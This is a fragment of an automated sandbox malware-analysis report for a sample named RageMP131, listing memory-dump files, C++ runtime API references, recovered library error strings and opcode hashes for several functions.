                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: at line $, column
                                    • API String ID: 4194217158-191570568
                                    • Opcode ID: 125baf7728b78b62a0fa8121292faf5e25d70e58cd6f9b2eb78f086d0f8516a6
                                    • Instruction ID: 195fe1d863000ff6bd8b5965a9c09037fea22a570f74ba845e180f6ccf4b6ea8
                                    • Opcode Fuzzy Hash: 125baf7728b78b62a0fa8121292faf5e25d70e58cd6f9b2eb78f086d0f8516a6
                                    • Instruction Fuzzy Hash: 9C614C71E102049FDB09DF68CC8979EBBB9FF45310F14821CE419AB781EB74AA90CB91
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E4109
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E4122
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: value
                                    • API String ID: 4194217158-494360628
                                    • Opcode ID: 6bf397057438b9e714ff422a7ac90402f6495ef7a9735df653876eb5fbb4c03b
                                    • Instruction ID: d238d4fd97478cca79163f5b8fa857034f87b2e33773b9f20a07177407746e52
                                    • Opcode Fuzzy Hash: 6bf397057438b9e714ff422a7ac90402f6495ef7a9735df653876eb5fbb4c03b
                                    • Instruction Fuzzy Hash: C051B3B0C10288DBDF15DFA4CC89BDDBBB4AF05304F148259E448AB382D7756A98CB61
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00273C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2659868963-1866435925
                                    • Opcode ID: 1ba982feae1316480fa85807d5f32f07fcb56bb261b5d4406637b8933199f747
                                    • Instruction ID: ff417a7a5d958731aab06304b771b13323bc143b358cf95a1f68f3d2ae7e86c6
                                    • Opcode Fuzzy Hash: 1ba982feae1316480fa85807d5f32f07fcb56bb261b5d4406637b8933199f747
                                    • Instruction Fuzzy Hash: CC11D2B6920709AFC715DF58D801B9AB3D8EF06320F14C52AF95C9B281F774EA24CB91
                                    Strings
                                    • unordered_map/set too long, xrefs: 002E2BD3
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: unordered_map/set too long
                                    • API String ID: 0-306623848
                                    • Opcode ID: 01a967d14be0733641e64cbc69bb50ff7b17bbbc526a5ab0eeb7ca28139cd986
                                    • Instruction ID: b63141e3bdff4508e106116ce9f99502dfbd3eece4a605317f297c32934a5f1a
                                    • Opcode Fuzzy Hash: 01a967d14be0733641e64cbc69bb50ff7b17bbbc526a5ab0eeb7ca28139cd986
                                    • Instruction Fuzzy Hash: 67E1F671A10146DFCB18DF69C891A6DB7E9FF48310F648369E81A9B382D730ED65CB90
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 0027844D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: parse error$ror
                                    • API String ID: 2659868963-4201802366
                                    • Opcode ID: 87698d26d3adb36f77554f4607e662a13d11798f6052d2bfdc83d73e97533c59
                                    • Instruction ID: 3d1654d047f19d5d8062bb9a9cafca8705c360263f37c69e2b8a27e82b746403
                                    • Opcode Fuzzy Hash: 87698d26d3adb36f77554f4607e662a13d11798f6052d2bfdc83d73e97533c59
                                    • Instruction Fuzzy Hash: 69C11731D206498FEB09CF68CC8979DBB75FF45304F14C248E4086B792DBB4AA94CB91
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00278051
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00278060
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: [json.exception.
                                    • API String ID: 4194217158-791563284
                                    • Opcode ID: 419064be4f55501ded65e828b5a55aee135d6d07bb460ae4704b461920b6ed6f
                                    • Instruction ID: 97923d660fc6d235490ee3944938389f686b57ff029218d748a27d681caff89b
                                    • Opcode Fuzzy Hash: 419064be4f55501ded65e828b5a55aee135d6d07bb460ae4704b461920b6ed6f
                                    • Instruction Fuzzy Hash: 0A9127309102089FDB19CFA8CC85BAEFBB5FF45314F14825DE404AB792D7B0A994CB91
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00273C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: ios_base::badbit set$ios_base::failbit set
                                    • API String ID: 2659868963-1240500531
                                    • Opcode ID: 258f7d2adcba02043f55f913fe27a3926144f96d5d609a4ade1d1b975ee23ea9
                                    • Instruction ID: 892e0ec4ccb3d8cfc838f70550755b752cf57a060b3c15531016a89cf1552865
                                    • Opcode Fuzzy Hash: 258f7d2adcba02043f55f913fe27a3926144f96d5d609a4ade1d1b975ee23ea9
                                    • Instruction Fuzzy Hash: 9441F6B5920209AFC715DF58CC41BAEF7F8EF45320F14C219F9189B681E774AA54CBA1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E4AB9
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E4AD2
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E55DD
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002E55F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: value
                                    • API String ID: 4194217158-494360628
                                    • Opcode ID: 3f7b988a507dc18cdc505d3fb818f37e187c89a13a2c3bb078a803906b2db2e4
                                    • Instruction ID: 1e05613be504f1061421b5781bcfbf5b7803410dc3355016b0ff615804f34b3a
                                    • Opcode Fuzzy Hash: 3f7b988a507dc18cdc505d3fb818f37e187c89a13a2c3bb078a803906b2db2e4
                                    • Instruction Fuzzy Hash: CF51B2B0C20698DFDF15DFA4CC89BDEBBB8AF05304F544259E404AB381D774AA888B91
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 002E9681
                                    Strings
                                    • type must be boolean, but is , xrefs: 002E9772
                                    • type must be string, but is , xrefs: 002E96E8
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task
                                    • String ID: type must be boolean, but is $type must be string, but is
                                    • API String ID: 118556049-436076039
                                    • Opcode ID: 4f89f316a25000d6372271e77e068d0bca0b1382f60b9e0981ef413721311ae6
                                    • Instruction ID: 6e53548c4497f92848ff39837fec5fcd97e55df26ad895c35140fe175e025ec2
                                    • Opcode Fuzzy Hash: 4f89f316a25000d6372271e77e068d0bca0b1382f60b9e0981ef413721311ae6
                                    • Instruction Fuzzy Hash: 08316E75D10284AFDB15EFA4D842B9EB7BCDB00310F50416AF819DB792EB34AD64CB52